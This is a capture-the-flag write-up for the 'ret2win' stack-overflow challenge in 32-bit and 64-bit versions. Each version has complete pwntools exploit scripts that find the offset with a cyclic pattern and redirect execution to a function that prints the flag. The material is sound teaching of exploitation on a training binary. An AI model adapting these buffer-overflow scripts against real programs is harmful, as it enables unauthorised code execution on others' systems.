ret2win
{"author": ["ret2basic"]}

32bit

Solution

Typical ret2text. There is an unused function ret2win located in the .text segment that calls system("/bin/cat flag.txt") for us. This is sometimes called "dead code".

Exploit

1
#!/usr/bin/env python3
2
from pwn import *
3
4
#--------Setup--------#
5
6
context(arch="i386", os="linux")
7
elf = ELF("ret2win32", checksec=False)
8
9
#--------Offset--------#
10
11
p = elf.process()
12
pattern = cyclic(1024)
13
p.sendlineafter("> ", pattern)
14
p.wait()
15
core = p.corefile
16
p.close()
17
os.remove(core.file.name)
18
offset = cyclic_find(core.eip)
19
20
log.info(f"{offset = }")
21
22
#--------ret2text--------#
23
24
ret2win = elf.sym["ret2win"]
25
26
payload = flat(
27
b"A" * offset,
28
ret2win,
29
)
30
31
p = elf.process()
32
33
p.sendlineafter("> ", payload)
34
35
p.interactive()
Copied!

64bit

Solution

The idea is essentially the same as the 32bit case.

Exploit

1
#!/usr/bin/env python3
2
from pwn import *
3
4
#--------Setup--------#
5
6
context(arch="amd64", os="linux")
7
elf = ELF("ret2win", checksec=False)
8
9
#-------Offset--------#
10
11
p = elf.process()
12
pattern = cyclic(1024)
13
p.sendlineafter("> ", pattern)
14
p.wait()
15
core = p.corefile
16
p.close()
17
os.remove(core.file.name)
18
offset = cyclic_find(core.read(core.rsp, 4))
19
20
log.info(f"{offset = }")
21
22
#--------ret2text--------#
23
24
ret2win = elf.sym["ret2win"]
25
26
payload = flat(
27
b"A" * offset,
28
ret2win,
29
)
30
31
p = elf.process()
32
33
p.sendlineafter("> ", payload)
34
35
p.interactive()
Copied!
Last modified 5mo ago
Copy link
Contents
32bit
64bit